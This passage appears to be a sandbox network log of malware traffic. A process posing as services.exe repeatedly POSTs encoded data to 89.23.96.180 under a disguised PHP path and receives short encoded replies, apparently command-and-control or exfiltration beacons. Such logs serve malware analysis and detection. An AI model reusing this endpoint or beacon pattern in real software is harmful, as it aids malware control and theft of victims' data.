                                                              Dec 21, 2024 10:48:46.315282106 CET | 2536 | OUT | Data Raw: 58 56 43 57 58 5b 57 56 55 5e 55 5a 54 53 50 5d 57 5e 5c 5a 52 52 51 5f 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCWX[WVU^UZTSP]W^\ZRRQ__]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY @-1/1.5Q=&.#0?,95"?%X'26Q<#^(X+%!_.#Q,
                                                              Dec 21, 2024 10:48:47.357382059 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:47.591365099 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              58 | 192.168.2.5 | 49965 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:47.843193054 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              59 | 192.168.2.5 | 49969 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:48.194130898 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2100
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:48.549829960 CET | 2100 | OUT | Data Raw: 58 53 43 53 58 5c 52 53 55 5e 55 5a 54 5b 50 50 57 59 5c 5f 52 56 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSCSX\RSU^UZT[PPWY\_RVQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY :W/1-=5-0]'8U,8 <%[&<'#<$Z)!_.#Q,2
                                                              Dec 21, 2024 10:48:49.586607933 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:49.822242022 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0f 23 15 07 11 3c 03 23 5e 2a 2f 2a 54 29 3e 3d 00 2c 54 2c 03 21 2c 29 00 3e 04 37 58 27 10 30 04 36 2a 2d 58 22 11 2b 12 3e 31 2e 58 01 1e 22 18 20 33 31 53 27 2c 37 55 28 24 2d 05 3c 2d 2e 5a 24 3f 34 0e 32 3a 15 07 3c 04 3b 0e 31 3d 0c 5d 2c 3f 09 5f 2b 58 30 56 26 36 2b 51 03 1e 25 04 25 2f 37 54 25 55 3d 13 32 58 25 5d 23 10 3b 1f 3f 3b 34 0b 23 2b 2e 5d 38 07 3b 05 28 3d 2e 5d 3d 06 00 12 30 2f 3b 1b 31 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98:#<#^*/*T)>=,T,!,)>7X'06*-X"+>1.X" 31S',7U($-<-.Z$?42:<;1=],?_+X0V&6+Q%%/7T%U=2X%]#;?;4#+.]8;(=.]=0/;1.#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              60 | 192.168.2.5 | 49970 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:48.323137045 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:48.674658060 CET | 2536 | OUT | Data Raw: 58 5e 43 5f 58 5d 57 52 55 5e 55 5a 54 5f 50 52 57 5a 5c 5f 52 55 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: X^C_X]WRU^UZT_PRWZ\_RUQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#:1%[:)![.Y %,$T--4*%*44?-_>5!_.#Q,6
                                                              Dec 21, 2024 10:48:49.700807095 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:49.934279919 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:49 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              61 | 192.168.2.5 | 49976 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:50.181874037 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:50.534004927 CET | 2536 | OUT | Data Raw: 5d 52 46 55 5d 5d 52 54 55 5e 55 5a 54 53 50 57 57 5f 5c 59 52 56 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]RFU]]RTU^UZTSPWW_\YRVQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E-3%=-=1[-#3<W.(-V#/2"V?7(?[ >!_.#Q,
                                                              Dec 21, 2024 10:48:51.559262991 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:51.794218063 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:51 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              62 | 192.168.2.5 | 49978 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:52.139067888 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:52.491070986 CET | 2536 | OUT | Data Raw: 5d 51 43 51 58 5b 57 50 55 5e 55 5a 54 5a 50 56 57 5c 5c 5f 52 5e 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]QCQX[WPU^UZTZPVW\\_R^Q\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY A-W<2U)980<<S:5 <!['2>U?0<['>!_.#Q,"
                                                              Dec 21, 2024 10:48:53.516086102 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:53.750524044 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:53 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              63 | 192.168.2.5 | 49984 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:53.994893074 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2532
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:54.346478939 CET | 2532 | OUT | Data Raw: 5d 53 43 5f 5d 5b 57 5e 55 5e 55 5a 54 5b 50 5d 57 5e 5c 5d 52 50 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]SC_][W^U^UZT[P]W^\]RPQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E910W&.%=69?'$W.8S"/9['!"P<B(?;=!_.#Q,


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              64 | 192.168.2.5 | 49989 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:54.975490093 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:55.331592083 CET | 2112 | OUT | Data Raw: 58 53 46 50 5d 5d 57 52 55 5e 55 5a 54 52 50 53 57 5b 5c 54 52 5f 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSFP]]WRU^UZTRPSW[\TR_Q\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#.1/1=9,,$Y'U-;)7?!\'"5(+8^>%!_.#Q,
                                                              Dec 21, 2024 10:48:56.349797964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:56.582842112 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:56 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 53 20 02 3d 11 2b 14 2c 03 3d 2f 00 57 3d 3e 3e 16 2f 32 20 04 36 2c 07 02 28 3d 27 13 30 3d 3b 58 21 03 32 04 22 3f 3c 07 2a 1b 2e 58 01 1e 21 44 37 1d 2e 0c 25 3f 37 55 28 37 2a 16 3f 10 26 59 27 2f 30 0e 24 39 2b 00 3c 03 23 0c 25 3e 2e 1f 38 06 3b 5f 29 3d 33 0e 24 1c 2b 51 03 1e 26 10 25 12 0d 53 25 33 29 11 26 2d 26 00 23 2e 37 54 29 16 2f 57 21 28 3a 5e 2f 39 0e 1b 2b 04 25 03 3d 01 3e 59 24 5a 2b 19 26 04 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989S =+,=/W=>>/2 6,(='0=;X!2"?<*.X!D7.%?7U(7*?&Y'/0$9+<#%>.8;_)=3$+Q&%S%3)&-&#.7T)/W!(:^/9+%=>Y$Z+&#T-,H1]V0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              65 | 192.168.2.5 | 49990 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:55.227880001 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:55.580857992 CET | 2536 | OUT | Data Raw: 5d 56 43 56 5d 5d 57 57 55 5e 55 5a 54 5e 50 53 57 5b 5c 5d 52 52 51 5a 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]VCV]]WWU^UZT^PSW[\]RRQZ_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY D.11==:9,0%?8-*"/62!6V+[(=,)!_.#Q,2
                                                              Dec 21, 2024 10:48:56.594433069 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:56.834234953 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:56 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              66 | 192.168.2.5 | 49996 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:57.085597992 CET | 398 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:48:57.440265894 CET | 2536 | OUT | Data Raw: 58 52 43 50 5d 59 57 57 55 5e 55 5a 54 5e 50 56 57 5a 5c 5f 52 51 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XRCP]YWWU^UZT^PVWZ\_RQQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY E9!2=.*9.,/'/+-#!%&W<$+=?*!_.#Q,2
                                                              Dec 21, 2024 10:48:58.462394953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:48:58.694391966 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:48:58 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              67 | 192.168.2.5 | 50002 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:48:58.939971924 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:48:59.283992052 CET | 2536 | OUT | Data Raw: 58 54 46 52 5d 5a 52 52 55 5e 55 5a 54 5c 50 55 57 5d 5c 55 52 5e 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTFR]ZRRU^UZT\PUW]\UR^QY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY B-/$=>=Z.''?'-4:%2>('<?<*%!_.#Q,
                                                              Dec 21, 2024 10:49:00.365125895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:00.554080963 CET | 200 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:00 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              68 | 192.168.2.5 | 50004 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:49:00.805372000 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:01.159497976 CET | 2536 | OUT | Data Raw: 58 50 43 5e 5d 57 52 55 55 5e 55 5a 54 52 50 50 57 5c 5c 5f 52 50 51 5a 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XPC^]WRUU^UZTRPPW\\_RPQZ_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY :W$&>*!.Y<'/987/)&1"V+4<>-?)!_.#Q,


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              69 | 192.168.2.5 | 50009 | 89.23.96.180 | 80 | 1352 | C:\Windows\InputMethod\CHT\services.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Dec 21, 2024 10:49:01.815587044 CET | 422 | OUT | POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:49:02.174602985 CET | 2112 | OUT | Data Raw: 58 5e 43 54 5d 5b 57 54 55 5e 55 5a 54 5d 50 5d 57 5f 5c 58 52 57 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: X^CT][WTU^UZT]P]W_\XRWQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY C93&>%?1%],/33<',(. =16P<'$<.(_)%!_.#Q,>
                                                              Dec 21, 2024 10:49:03.186129093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:49:03.422312021 CET | 349 | IN | HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:49:03 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0c 20 3b 25 11 3c 2a 33 12 29 3c 2d 0c 29 58 3d 06 2f 0c 34 06 22 2c 3e 13 3e 03 0d 10 30 3e 2c 04 21 14 32 04 36 3c 33 13 2a 31 2e 58 01 1e 22 18 23 55 29 1f 33 3f 0d 55 3d 37 2a 5b 3c 2d 3a 58 27 3f 05 53 32 5c 34 58 3c 14 05 09 27 3d 3e 5d 38 06 2f 10 2b 3e 20 1d 24 26 2b 51 03 1e 26 58 26 2c 2f 55 26 0d 1b 12 31 3e 3d 58 20 3e 28 0f 3e 38 02 09 34 3b 03 07 2f 5f 23 07 28 03 25 02 2a 06 0c 59 24 3f 3c 0a 25 3e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
